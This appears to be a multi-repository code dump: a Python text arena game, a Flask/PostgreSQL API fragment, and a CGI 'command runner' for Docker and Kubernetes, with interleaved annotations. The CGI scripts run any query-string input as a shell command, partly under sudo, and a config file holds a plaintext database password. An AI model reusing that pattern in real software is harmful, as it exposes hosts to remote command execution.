blade.\")\n time.sleep(2)\n print(\"In the distance, you hear the ferocious growl of a bear...\")\n arena.bear_encounter()\n \n def encounter_3(self):\n \n 
PlayerCharacter.player_character.reset_stats()\n \n arena = Encounters()\n print(\"\\nThe bear heaves it's last breath, rolled over on its side.\")\n time.sleep(2)\n print(\"With barely a moment to breathe, you see your next opponent approaching...\")\n arena.seasoned_g_encounter()\n \n def encounter_4(self):\n \n PlayerCharacter.player_character.reset_stats()\n \n arena = Encounters()\n print(\"\\nThe gladiator is gone, but you hear the hiss of a basilisk...\")\n arena.basilisk_encounter()\n \n def encounter_5(self):\n \n PlayerCharacter.player_character.reset_stats()\n \n arena = Encounters()\n print(\"\\nThe basilisk lies at your feet, cut in half.\")\n time.sleep(2)\n print(\"You feel the warmth of fire on the back of your neck, and look around to see an angry-looking dragon...\")\n arena.dragon_encounter()\n \narena_fighter = Game()\n"
},
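The script above delegates `attack`, `take_damage`, and `player_death` to a `class_methods` module that does not appear in this dump. Below is a minimal sketch of what those helpers could look like, inferred from the attribute names used in classes.py (`weapon.damage`, `current_health`, `max_health`, `alive`, `damage_done`); treat every detail as an assumption rather than the author's code.

```python
# Hypothetical class_methods.py helpers -- NOT from the repo; the attribute
# names come from classes.py, the behaviour is guessed.
def attack(self, target):
    # The combat loop reads damage_done afterwards, so store it here.
    self.damage_done = self.weapon.damage
    print(f"\n{self.name} attacks {target} with a {self.weapon.weapon_type}!")

def take_damage(self, amount):
    self.current_health -= amount
    print(f"\n{self.name} takes {amount} damage "
          f"({self.current_health}/{self.max_health} HP remaining).")
    if self.current_health <= 0:
        self.alive = False

def player_death(self):
    # main.py calls this after every enemy turn.
    if self.current_health <= 0:
        print(f"\n{self.name} has fallen in the arena...")
        exit(0)
```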
{
"alpha_fraction": 0.5647059082984924,
"alphanum_fraction": 0.5882353186607361,
"avg_line_length": 18.225807189941406,
"blob_id": "d981ea81471ca5e9e2dc97a6e105bee2bc7927f1",
"content_id": "64ab30c7fe6ea3eddba3210483bde00b84079b75",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 595,
"license_type": "no_license",
"max_line_length": 101,
"num_lines": 31,
"path": "/spells.py",
"repo_name": "vcable/Arena-Fighter",
"src_encoding": "UTF-8",
"text": "# Defines all the available spells in the game. These are used both by the player character and NPCs\n\nclass Fireball:\n \n spell_name = \"Fireball\"\n mana_required = 2\n damage = 10\n \nclass FrozenArrow:\n \n spell_name = \"Frozen Arrow\"\n mana_required = 2\n damage = 10\n \nclass MeteorShower:\n \n spell_name = \"Meteor Shower\"\n mana_required = 5\n damage = 20\n \nclass LightningBolt:\n \n spell_name = \"Lightning Bolt\"\n mana_required = 2\n damage = 10\n \nclass Stun:\n \n spell_name = \"Stun\"\n mana_required = 5\n damage = 0"
},
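The spells above are bare classes used only for their class attributes. One possible alternative (a sketch, not the repo's code) is a frozen dataclass table, which keeps the same attribute names that classes.py reads while making new spells one-liners:

```python
# Alternative spell table as frozen dataclasses -- an illustration, not the
# author's design. Attribute names match those used elsewhere in the repo.
from dataclasses import dataclass

@dataclass(frozen=True)
class Spell:
    spell_name: str
    mana_required: int
    damage: int

FIREBALL = Spell("Fireball", 2, 10)
FROZEN_ARROW = Spell("Frozen Arrow", 2, 10)
METEOR_SHOWER = Spell("Meteor Shower", 5, 20)
LIGHTNING_BOLT = Spell("Lightning Bolt", 2, 10)
STUN = Spell("Stun", 5, 0)
```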
{
"alpha_fraction": 0.7628742456436157,
"alphanum_fraction": 0.7640718817710876,
"avg_line_length": 43,
"blob_id": "a1fe69f4053196351a3a64fbdb9a7b7cbf5da95f",
"content_id": "c04b1567dcff687d841255511135d9925925fa9a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 835,
"license_type": "no_license",
"max_line_length": 154,
"num_lines": 19,
"path": "/README.md",
"repo_name": "vcable/Arena-Fighter",
"src_encoding": "UTF-8",
"text": "**What is Arena Fighter?**\n\nArena fighter is a simple text-based game where the player is pitted against various enemies.\nThe player can choose between three classes: Fighter, Hunter, and Mage. \nAs of right now, the game is in very early stages, but as time goes on I plan on adding more complex features like\nXP, more advanced AI, more encounters, more classes, and more abilities/spells/items/weapons.\n\n**How to Run the Game**\n\nIf you're interested in checking out Arena Fighter, simply clone the repository, install the dependencies listed below, and run *main.py* with Python 3. \nDISCLAIMER: THE GAME IS NOT FINISHED AT ALL\n\n**Dependencies**\n\nAt the moment, there is only one required library, <a href=\"https://pypi.org/project/termcolor/\">termcolor</a>.\n\n**Changelog**\n\nView a record of all the updates in the CHANGELOG.md file."
},
{
"alpha_fraction": 0.5776119232177734,
"alphanum_fraction": 0.5776119232177734,
"avg_line_length": 39.06060791015625,
"blob_id": "380141b33ce5c5c0fea73b9217395e0bbbe7cf89",
"content_id": "8ecf4c8f7641b38a215c8ce53cc26441f8ea5e07",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1340,
"license_type": "no_license",
"max_line_length": 95,
"num_lines": 33,
"path": "/inventory.py",
"repo_name": "vcable/Arena-Fighter",
"src_encoding": "UTF-8",
"text": "# The inventory allows both players and enemies to store items, and access them\n\nfrom termcolor import colored, cprint\nimport class_methods\n\n# When creating the class, specify the weapon (enemy or player's default weapon at the moment) \n# and number of health/mana potions\nclass Inventory:\n \n def __init__(self, weapon, hp_num, mp_num):\n self.weapon = weapon\n self.health_potion = hp_num\n self.mana_potion = mp_num\n \n # Weapons picked up through loot system go in this array\n self.weapons = []\n \n # Prints out inventory \n def print_inventory(self):\n \n cprint(\"_____________\", \"yellow\")\n cprint(\"\\nINVENTORY\", \"yellow\")\n weapon = colored(f\"{self.weapon}\", \"yellow\")\n print(f\"\\nEquipped weapon: \" + weapon)\n print(f\"\\nOther weapons: \" + (\", \").join(self.weapons))\n hp_amount = colored(str(self.health_potion) + \" health potion(s)\", \"yellow\")\n mp_amount = colored(str(self.mana_potion) + \" mana potion(s)\", \"yellow\")\n print(\"\\nYou have \" + hp_amount + \" and \" + mp_amount)\n #print(\"\\nTo equip a different weapon, enter 'equip.'\")\n #p_input = input(\"> \")\n #if p_input.lower().strip(\"\\n\") == \"equip\":\n #class_methods.equip(self)\n cprint(\"_____________\", \"yellow\")\n\n \n "
},
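`print_inventory` above leaves an equip flow commented out, and the `class_methods.equip(self)` it would call is not in this dump. A minimal guess at that helper follows, assuming only the Inventory fields defined above; names and behaviour are hypothetical.

```python
# Hypothetical class_methods.equip -- NOT from the repo. It receives the
# Inventory instance, matching the commented-out call above.
def equip(inventory):
    if not inventory.weapons:
        print("\nYou have no other weapons to equip.")
        return
    print("\nWhich weapon would you like to equip?")
    print(", ".join(inventory.weapons))
    choice = input("> ").strip()
    if choice in inventory.weapons:
        # Swap the currently equipped weapon with the chosen one.
        inventory.weapons.remove(choice)
        inventory.weapons.append(inventory.weapon)
        inventory.weapon = choice
        print(f"\nYou equip the {choice}.")
    else:
        print("\nThat weapon is not in your inventory.")
```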
{
"alpha_fraction": 0.5759946703910828,
"alphanum_fraction": 0.5820955038070679,
"avg_line_length": 34.56132125854492,
"blob_id": "6f6e398a60860bb686ad7146c34bb3ef55976cba",
"content_id": "6a290ff84f2d7218486b28cc3e6f455afe77a4a0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7540,
"license_type": "no_license",
"max_line_length": 165,
"num_lines": 212,
"path": "/classes.py",
"repo_name": "vcable/Arena-Fighter",
"src_encoding": "UTF-8",
"text": "# This file will define the available classes in Arena Fighter\n# At the moment, there are three classes: Fighter, Mage, and Hunter\n\n# The fighter uses swords, spears, and clubs, and fights in close quarters\n# The mage uses spells, and engages from afar\n# The hunter uses ranged weapons such as longbows, crossbows, and slingshots\n\n# Each class has default weapons/spells, and starts with 3 health potions\n\nimport weapons\nimport class_methods\nimport spells\nimport inventory\nfrom termcolor import colored, cprint\n\n\nclass Fighter:\n\n # Init function to set a user-defined name and default stats\n def __init__(self, name):\n self.name = colored(name, \"blue\")\n self.class_name = \"Fighter\"\n self.weapon = weapons.Shortsword\n self.max_health = 100\n self.current_health = 100\n self.alive = True\n self.strength = 10\n self.dexterity = 5\n self.damage_done = 0\n self.inventory = inventory.Inventory(f\"{self.weapon.weapon_type}\", 1, 0)\n \n print(f\"\\nYour fighter's name is {self.name} and he is armed with a {self.weapon.weapon_type}.\")\n\n # Attacks a target and does damage based on weapon\n attack = class_methods.attack\n\n # Subtracts taken damage from current health\n take_damage = class_methods.take_damage\n\n # Checks for death\n player_death = class_methods.player_death\n \n # Resets health\n reset_stats = class_methods.reset_stats\n\n # Uses health potion\n consume_potion = class_methods.player_consume_potion\n \n # Runs loot generator\n loot = class_methods.loot\n \n # Equips different weapon\n #equip = class_methods.equip\n\nclass Mage:\n \n # Sets user-defined name and default stats\n def __init__(self, name):\n self.name = name\n self.weapon = weapons.WoodenStaff\n self.max_health = 80\n self.damage_done = 0\n self.current_health = 80\n self.alive = True\n self.class_name = \"Mage\"\n self.strength = 5\n self.dexterity = 6\n self.max_mana = 30\n self.current_mana = 30\n self.fireball = spells.Fireball\n self.frozen_arrow = spells.FrozenArrow\n self.meteor_shower = spells.MeteorShower\n self.inventory = inventory.Inventory(f\"{self.weapon.weapon_type}\", 1, 2)\n \n self.spell_list = [colored(\"\\nMeteor Shower\", \"yellow\"), \n colored(\"Fireball\", \"yellow\"), \n colored(\"Frozen Arrow\", \"yellow\")]\n self.mana_costs = [\"(15 mana)\",\n \"(10 mana)\",\n \"(10 mana)\",]\n \n print(f\"Your mage's name is {self.name} and he is armed with a {self.weapon.weapon_type}.\")\n \n # Subtract taken damage from current_health\n take_damage = class_methods.take_damage\n \n # Checks if current_health <= 0\n player_death = class_methods.player_death\n \n # Resets health and mana\n reset_stats = class_methods.reset_stats\n \n # Uses health/mana potion\n consume_potion = class_methods.player_consume_potion\n \n loot = class_methods.loot\n \n #equip = class_methods.equip\n \n # Keeps track of mage's spells and lists them\n def list_spells(self):\n \n cprint(\"\\nSPELLS\", \"yellow\")\n \n # I realize this method for concatenating elements from two\n # different arrays is dumb but I'm still new to Python\n j = 0\n for i in self.spell_list:\n print(i + \" \" + self.mana_costs[j]) \n j += 1\n \n \n # Allows mages to pick from available spells\n def pick_spell(self):\n self.list_spells()\n print(\"\\nEnter a spell to equip it. Enter 'back' to go back to turn menu.\")\n spell_selection = input(\"> \")\n \n if spell_selection.lower().strip(\"\\n\") == \"fireball\":\n print(\"\\nYou have selected the Fireball spell. Are you sure? 
(yes/no)\")\n p_input = input(\"> \")\n if p_input.lower().strip(\"\\n\") == \"yes\":\n self.equiped_spell = spells.Fireball\n elif p_input.lower().strip(\"\\n\") == \"no\":\n print(\"\\nPick another spell!\")\n self.pick_spell()\n \n elif spell_selection.lower().strip(\"\\n\") == \"frozen arrow\":\n print(\"\\nYou have selected the Frozen Arrow spell. Are you sure? (yes/no)\")\n p_input = input(\"> \")\n if p_input.lower().strip(\"\\n\") == \"yes\":\n self.equiped_spell = spells.FrozenArrow\n elif p_input.lower().strip(\"\\n\") == \"no\":\n print(\"\\nPick another spell!\")\n self.pick_spell()\n \n elif spell_selection.lower().strip(\"\\n\") == \"meteor shower\":\n print(\"\\nYou have selected the Meteor Shower spell. Are you sure? (yes/no)\")\n p_input = input(\"> \")\n if p_input.lower().strip(\"\\n\") == \"yes\":\n self.equiped_spell = spells.MeteorShower\n elif p_input.lower().strip(\"\\n\") == \"no\":\n print(\"\\nPick another spell!\")\n self.pick_spell()\n \n else:\n print(\"\\nThat is not a valid spell, please try again. If you would like to choose a different action, enter 'action'. Otherwise, press the enter key.\")\n self.pick_spell()\n \n \n # Casts the currently equipped spell \n def cast_equipped_spell(self, target):\n if self.current_mana < self.equiped_spell.mana_required:\n print(\"\\nNot enough mana. Select a different spell or drink a mana potion.\")\n self.pick_spell()\n else:\n print(f\"\\n{self.name} casts {self.equiped_spell.spell_name} on {target}.\")\n self.damage_done = self.equiped_spell.damage\n self.current_mana -= self.equiped_spell.mana_required\n print(f\"\\n{self.name} does {self.damage_done} damage with {self.equiped_spell.spell_name}.\")\n \n # Allows mages to attack\n def attack(self, target):\n self.pick_spell()\n print(\"\\nCast currently equipped spell? (yes/no)\")\n p_input = input(\"> \")\n if p_input.lower().strip(\"\\n\") == \"yes\":\n target = target\n self.cast_equipped_spell(target)\n elif p_input.lower().strip(\"\\n\") == \"no\":\n print(\"\\nPick a different spell.\")\n self.pick_spell()\n \n \n\nclass Hunter:\n \n # Init function to set a user-defined name and default stats\n def __init__(self, name):\n self.name = name \n self.weapon = weapons.Longbow\n self.damage_done = 0\n self.class_name = \"Hunter\"\n self.max_health = 75\n self.current_health = 75\n self.alive = True\n self.strength = 5\n self.dexterity = 10\n self.inventory = inventory.Inventory(f\"{self.weapon.weapon_type}\", 1, 0)\n \n self.weapons = []\n \n print(f\"Your hunter's name is {self.name} and he is armed with a {self.weapon.weapon_type}.\")\n \n # Attack method works the same way as the fighter\n attack = class_methods.attack\n \n # Take damage method works the same way as the fighter\n take_damage = class_methods.take_damage\n \n # Check if current_health <= 0\n player_death = class_methods.player_death\n \n # Resets health \n reset_stats = class_methods.reset_stats\n \n # Uses health potion\n consume_potion = class_methods.player_consume_potion\n \n loot = class_methods.loot\n \n #equip = class_methods.equip\n\n"
},
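A short usage sketch for the Mage class above, assuming all of the repo's modules (including the missing class_methods.py) import cleanly; the mana arithmetic follows the costs in spells.py.

```python
# Usage sketch only -- assumes class_methods.py exists and imports work.
import classes

merlin = classes.Mage("Merlin")
merlin.list_spells()                 # each spell printed next to its mana cost
merlin.equiped_spell = merlin.fireball
merlin.cast_equipped_spell("Glorb")  # deducts Fireball's 2 mana
print(merlin.current_mana)           # 28
```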
{
"alpha_fraction": 0.7777777910232544,
"alphanum_fraction": 0.7777777910232544,
"avg_line_length": 17.16666603088379,
"blob_id": "7f7de5230a5e99014e2012d7f474bc85b4b0961e",
"content_id": "f82c8694dd9aa5de144a4e62e312d79e244fab19",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 108,
"license_type": "no_license",
"max_line_length": 31,
"num_lines": 6,
"path": "/test.py",
"repo_name": "vcable/Arena-Fighter",
"src_encoding": "UTF-8",
"text": "import class_methods\nimport classes\n\nbob = classes.Fighter(\"Bob\")\nbob.loot()\nbob.inventory.print_inventory()"
},
{
"alpha_fraction": 0.5988371968269348,
"alphanum_fraction": 0.6220930218696594,
"avg_line_length": 14.727272987365723,
"blob_id": "5b2d0cfd4f2c49b6e0261f6ec259dd122b5da55f",
"content_id": "0ce3e6353b7d8844abb8b22d6c7bd6aff4f68da3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 172,
"license_type": "no_license",
"max_line_length": 26,
"num_lines": 11,
"path": "/potions_and_items.py",
"repo_name": "vcable/Arena-Fighter",
"src_encoding": "UTF-8",
"text": "# Defines consumables\n\nclass HealthPotion:\n \n name = \"Health Potion\"\n healing_points = 10\n \nclass ManaPotion:\n \n name = \"Mana Potion\"\n mana_points = 10"
},
{
"alpha_fraction": 0.7252916097640991,
"alphanum_fraction": 0.7516881227493286,
"avg_line_length": 39.22222137451172,
"blob_id": "7aeefb671c43af1cb95e8bee120462accc47b3ec",
"content_id": "4e544275fb28d87fa35199a7cda9e38602104fb8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 3258,
"license_type": "no_license",
"max_line_length": 261,
"num_lines": 81,
"path": "/CHANGELOG.md",
"repo_name": "vcable/Arena-Fighter",
"src_encoding": "UTF-8",
"text": "**Changelog**\n\n**Version 0.5** -- 8th update, 10/24/19\n\nAdded more weapons and spells. This update also adds a loot system, where a random item is dropped after every encounter. Different items drop for each class, and the next update will add more weapons/items and a way to equip new weapons from the inventory. \n\n\n**Version 0.42** -- 7th update, 10/21/19\n\nAdded a function to clear the screen before starting the game and improved player death checks.\nMore text display/formatting improvements.\n\n\n**Version 0.41** -- 6th update, 10/20/19\n\nVarious enhancements to the Mage class, such as a dedicated spell screen, and some formatting fixes for combat text output.\n\n\n**Version 0.4** -- 5th update, 10/20/19\n\nPretty big update, this one adds:\n\n Potions\n Some basic AI\n An inventory system\n\nThere are currently two potions in the game, health potions and mana potions. They restore 10 points to their respective stats.\nAll enemies spawn with 1 health potion (or 2 for the final boss), and player classes spawn with 1 health potion (and 2 mana potions if you're a mage.) \n\nThe AI is extremely rudimentary, and all it does is consume a health potion if its health is below 20.\n\nThe inventory can be displayed at the beginning of every turn, and shows the equipped weapon, as well as available potions.\n\n*A small note:* I'm tremendously enjoying working on this game, I think it's the most fun I've had with programming since I started 4 months ago. As soon as I flesh out the base game, I'll work on adding a full GUI to it. \n\n\n**Version 0.3** -- 4th update, 10/19/19\n\nThis update adds general text formatting and text highliting, making everything much prettier to look at. This is done through the \nwonderful <a href=\"https://pypi.org/project/termcolor/\">termcolor</a> library.\n\n\n**Version 0.2** -- 3rd update, 10/19/19\n\nThis update adds all five encounters to the game. I might add more later, but for now I think that five is plenty. \nThe current enemies are, in order:\n\n Weak Swordsman\n Bear\n Seasoned Gladiator\n Basilisk\n Small Dragon\n\nEach enemy has a unique weapon.\n\n\n**Version 0.11** -- 2nd update, 10/19/19\n\nThis update adds functionality to allow mages to cast spells. At the moment, there are only 3 spells: Fireball, Ice Arrow, and Meteor Shower. \nThe player is able to select which spell they would like to cast before attacking each turn.\n\n\n**Version 0.1** -- Initial release, 10/19/19\n\n*Classes*\n\nThe game currently has 3 classes: Fighter, Mage, and Hunter. The Fighter class is fully functional, but the Mage class\nis missing some spell casting abilities, and the Hunter class has not been tested but should work in theory.\n\n*Gameplay Loop*\n\nThe game only has one encounter at the moment, with a Weak Swordsman named Glorb. Glorb has the ability to attack, but that's about it.\nIn future updates I'll give enemies the ability to drink health potions when they are low on health, and switch weapons/spells.\n\n*Items/Weapons*\n\nThere are only 4 weapons right now, with each one being the default for either a player-selectable class or the enemy.\n\n*Styling* \n\nThe styling is non-existent at the moment. I'm definitely going to add colored text, formatting, and the like when I get the core game fleshed out.\n"
},
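Version 0.5 above describes the loot system (a random, class-specific drop after each encounter), but the `class_methods.loot` it refers to is not included in this dump. Here is a sketch of how such a drop table could work; the table contents are invented for illustration, and only the attribute and item names come from the repo's other files.

```python
# Hypothetical loot helper -- NOT the repo's implementation. Item names are
# drawn from weapons.py and potions_and_items.py; the per-class tables are
# invented.
import random

LOOT_TABLES = {
    "Fighter": ["longsword", "morningstar", "Health Potion"],
    "Mage":    ["Mana Potion", "Health Potion"],
    "Hunter":  ["crossbow", "slingshot", "Health Potion"],
}

def loot(self):
    # Pick one drop appropriate to the player's class.
    drop = random.choice(LOOT_TABLES[self.class_name])
    print(f"\nThe fallen enemy drops: {drop}!")
    if drop == "Health Potion":
        self.inventory.health_potion += 1
    elif drop == "Mana Potion":
        self.inventory.mana_potion += 1
    else:
        self.inventory.weapons.append(drop)
```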
{
"alpha_fraction": 0.6073883175849915,
"alphanum_fraction": 0.6254295706748962,
"avg_line_length": 18.74576187133789,
"blob_id": "de191968ec4a638e97d4408f9063aa7166f21ca0",
"content_id": "1bc85c79582b9d177e9e3b1b1639364ef4a9b117",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1164,
"license_type": "no_license",
"max_line_length": 74,
"num_lines": 59,
"path": "/weapons.py",
"repo_name": "vcable/Arena-Fighter",
"src_encoding": "UTF-8",
"text": "from termcolor import colored, cprint\n\n# This file defines all the available weapons in the game, and their stats\n# Stats: Starting simple, the only stat will be damage\n\nclass Shortsword:\n\n weapon_type = colored(\"shortsword\", \"yellow\")\n damage = 10\n\nclass Longsword:\n \n weapon_type = colored(\"longsword\", \"yellow\")\n damage = 15\n\nclass RustyShortsword:\n\n weapon_type = colored(\"rusty shortsword\", \"yellow\")\n damage = 5\n \nclass WoodenStaff:\n \n weapon_type = colored(\"wooden staff\", \"yellow\")\n damage = 10\n \nclass Longbow:\n \n weapon_type = colored(\"longbow\", \"yellow\")\n damage = 10\n \nclass Crossbow:\n \n weapon_type = colored(\"crossbow\", \"yellow\")\n damage = 15\n \nclass Claws:\n \n weapon_type = colored(\"claws\", \"yellow\")\n damage = 10\n \nclass Morningstar:\n \n weapon_type = colored(\"morningstar\", \"yellow\")\n damage = 13\n \nclass Fangs:\n \n weapon_type = colored(\"fangs\", \"yellow\")\n damage = 12\n \nclass Firebreath:\n \n weapon_type = colored(\"fire breath\", \"yellow\")\n damage = 10\n \nclass Slingshot:\n \n weapon_type = colored(\"slingshot\", \"yellow\")\n damage = 10"
}
] | 11 |
arnavnagayech/Docker-K8s-Command-Runner
|
https://github.com/arnavnagayech/Docker-K8s-Command-Runner
|
14ca1124f0e59147d55f7e578415d0c97a675acb
|
be185df52cdef69543c0dafd278d0045bb6cbfb5
|
12fddc177f9d9a29fe0781053bd546770936290d
|
refs/heads/main
| 2023-06-30T17:04:01.767887 | 2021-08-04T13:10:50 | 2021-08-04T13:10:50 | 389,492,043 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6417322754859924,
"alphanum_fraction": 0.6456692814826965,
"avg_line_length": 14,
"blob_id": "7e9365d3672ffaa50cef555ad89aa808feb79f1d",
"content_id": "d31a0185cd11c7c3dfd1813d260fc42049bcf5e5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 254,
"license_type": "no_license",
"max_line_length": 38,
"num_lines": 16,
"path": "/docker/docker.py",
"repo_name": "arnavnagayech/Docker-K8s-Command-Runner",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python3\r\n\r\nimport cgi , subprocess\r\n\r\nprint(\"content-type: text/html\")\r\nprint()\r\n\r\na = cgi.FieldStorage()\r\ncmd = a.getvalue(\"s\")\r\n\r\nif \"kubectl\" in cmd:\r\n\to= subprocess.getoutput(\"sudo \"+ cmd)\r\nelse:\r\n\to = subprocess.getoutput(cmd)\r\n\r\nprint(o)"
},
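The script above is a CGI handler that reads a shell command from the `s` query parameter and returns its output. A sketch of calling it from Python follows; the host and the `/cgi-bin/` path are assumptions, only the parameter name comes from the script itself.

```python
# Client sketch for the CGI handler above. Host and /cgi-bin/ path are
# assumptions -- adjust to wherever httpd actually serves the script.
import urllib.parse
import urllib.request

def run_remote(cmd, host="192.168.1.10"):
    url = "http://{}/cgi-bin/docker.py?{}".format(
        host, urllib.parse.urlencode({"s": cmd}))
    with urllib.request.urlopen(url) as resp:
        return resp.read().decode()

print(run_remote("docker ps"))
```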
{
"alpha_fraction": 0.654411792755127,
"alphanum_fraction": 0.658088207244873,
"avg_line_length": 15.125,
"blob_id": "c6d4fa8d62b7c774dada2cdcbbfe14f9dedc7ef8",
"content_id": "68707d6f445defed5d3d4498d4e4d12a9088b45d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 272,
"license_type": "no_license",
"max_line_length": 56,
"num_lines": 16,
"path": "/K8s/k8s.py",
"repo_name": "arnavnagayech/Docker-K8s-Command-Runner",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python3\r\n\r\nimport cgi , subprocess\r\n\r\nprint(\"content-type: text/html\")\r\nprint()\r\n\r\na = cgi.FieldStorage()\r\ncmd = a.getvalue(\"s\")\r\n\r\nif \"kubectl\" in cmd:\r\n\to= subprocess.getoutput(cmd+\" --kubeconfig admin.conf\")\r\nelse:\r\n\to = subprocess.getoutput(cmd)\r\n\r\nprint(o)"
},
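Both CGI handlers pass raw user input to a shell via `subprocess.getoutput`, so anything injected into `s` runs on the host. A more defensive variant (a sketch, not the repo's code) whitelists `kubectl` and avoids the shell entirely:

```python
# Hardened sketch -- NOT the repo's code. Splits the command instead of
# handing the raw string to a shell, and only allows kubectl.
import shlex
import subprocess

def run_kubectl(cmd):
    parts = shlex.split(cmd)
    if not parts or parts[0] != "kubectl":
        return "only kubectl commands are allowed"
    # Same kubeconfig suffix the original script appends.
    parts += ["--kubeconfig", "admin.conf"]
    result = subprocess.run(parts, capture_output=True, text=True)
    return result.stdout + result.stderr
```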
{
"alpha_fraction": 0.7018425464630127,
"alphanum_fraction": 0.785594642162323,
"avg_line_length": 41.64285659790039,
"blob_id": "192be40cd0c456f6713d1ac35e97f18d948b3a7b",
"content_id": "b56c57f7339ad8ef68bf6af3d89f141654be225b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 597,
"license_type": "no_license",
"max_line_length": 107,
"num_lines": 14,
"path": "/README.md",
"repo_name": "arnavnagayech/Docker-K8s-Command-Runner",
"src_encoding": "UTF-8",
"text": "# Docker-K8s-Command-Runner\n\nThis is an application which runs Docker & Kubernetes commands & show output on browser.\n\nIn RedHat Linux 8, Docker , Kubernetes & used services like Httpd & python CGI.\n\n\nBlog For docker -> https://arnavnagayechlinuxworldtasks.wordpress.com/2021/06/25/task-7-1/\n\n\n\n\n\nBlog For K8s -> https://arnavnagayechlinuxworldtasks.wordpress.com/2021/06/30/task-9/\n"
}
] | 3 |
alejovicu/py-automation-example
|
https://github.com/alejovicu/py-automation-example
|
a9d4c68555a917b2b779a258d1102efbfcfe5dd7
|
f054a0b29636a70f4768423104f3e658c857ce88
|
b8e89c92a375e311efaaccc49621a7040cea932d
|
refs/heads/master
| 2020-04-06T19:06:39.054064 | 2018-12-07T18:12:27 | 2018-12-07T18:12:27 | 157,726,068 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.692307710647583,
"alphanum_fraction": 0.7094017267227173,
"avg_line_length": 28.375,
"blob_id": "36df3d9b2eb1844d4a8319f950af6a47ea0e0852",
"content_id": "f9ce280cb2aa8699d2f4e2d8dfb032d9fba8341f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 234,
"license_type": "no_license",
"max_line_length": 81,
"num_lines": 8,
"path": "/api/test-api.sh",
"repo_name": "alejovicu/py-automation-example",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/sh\n\ndocker run --rm --link py-api:py-api byrnedo/alpine-curl http://py-api:5000/user/\n\ndocker rm -f test-api\ndocker run -d --name=test-api --link py-api:py-api flask-api\ndocker exec -i test-api behave\ndocker rm -f test-api"
},
{
"alpha_fraction": 0.5556994676589966,
"alphanum_fraction": 0.5608808398246765,
"avg_line_length": 21.05714225769043,
"blob_id": "78334fdd397320f107f2fa0f85b75ec26677258d",
"content_id": "e94a5c608c543efb499e36ab8523906d51eb6052",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 772,
"license_type": "no_license",
"max_line_length": 56,
"num_lines": 35,
"path": "/api/flask_web/connect_db.py",
"repo_name": "alejovicu/py-automation-example",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python\nimport json\nimport psycopg2\nfrom config import config\n \ndef getAllUsers():\n \"\"\" Connect to the PostgreSQL database server \"\"\"\n conn = None\n users = []\n try:\n params = config()\n conn = psycopg2.connect(**params)\n\n cur = conn.cursor()\n\n cur.execute('SELECT * FROM public.user')\n columns = ('user_id', 'name')\n \n for row in cur.fetchall():\n users.append(dict(zip(columns, row)))\n \n cur.close()\n\n except (Exception, psycopg2.DatabaseError) as error:\n print(error)\n finally:\n if conn is not None:\n conn.close()\n print('Database connection closed.')\n \n return json.dumps(users, indent=2)\n \n \nif __name__ == '__main__':\n connect()\n"
},
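`config` is imported above from a config.py that is not part of this dump. Given the `[postgresql]` section in database.ini (the next record), it most likely reads that file with ConfigParser; here is a sketch under that assumption.

```python
# Hypothetical config.py -- NOT included in the repo dump. Assumes the
# [postgresql] section layout shown in database.ini.
from configparser import ConfigParser

def config(filename='database.ini', section='postgresql'):
    parser = ConfigParser()
    parser.read(filename)
    if not parser.has_section(section):
        raise Exception(f'Section {section} not found in {filename}')
    # psycopg2.connect(**params) accepts these keys as keyword arguments.
    return dict(parser.items(section))
```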
{
"alpha_fraction": 0.7701149582862854,
"alphanum_fraction": 0.8160919547080994,
"avg_line_length": 13.5,
"blob_id": "9e39cd5f1c4103eaf243f56a36bfcb33da087caf",
"content_id": "f0c733b008793dc8bd5861862e8dead816f72429",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "INI",
"length_bytes": 87,
"license_type": "no_license",
"max_line_length": 21,
"num_lines": 6,
"path": "/api/flask_web/database.ini",
"repo_name": "alejovicu/py-automation-example",
"src_encoding": "UTF-8",
"text": "[postgresql]\nhost=db\nport=5432\ndatabase=api-database\nuser=postgres\npassword=astrongpass\n"
},
{
"alpha_fraction": 0.6630434989929199,
"alphanum_fraction": 0.7010869383811951,
"avg_line_length": 35.79999923706055,
"blob_id": "6a0f50d85f4e80f2c6a47d655c24ad614b0c2c76",
"content_id": "96f474d9cba84ff6f765529f89a3cbe107e26a8d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 184,
"license_type": "no_license",
"max_line_length": 144,
"num_lines": 5,
"path": "/db/deploy-db-admin.sh",
"repo_name": "alejovicu/py-automation-example",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/sh\n\ndocker rm -f db-admin\n\ndocker run --name db-admin -p 8080:80 --link db:db -e \"[email protected]\" -e \"PGADMIN_DEFAULT_PASSWORD=admin\" -d dpage/pgadmin4\n"
},
{
"alpha_fraction": 0.6931408047676086,
"alphanum_fraction": 0.6931408047676086,
"avg_line_length": 20.30769157409668,
"blob_id": "deab9ce2ab766e60def71462d369404155000c49",
"content_id": "34acabd98364e6e4d0ff779b9809541076b17c95",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 277,
"license_type": "no_license",
"max_line_length": 46,
"num_lines": 13,
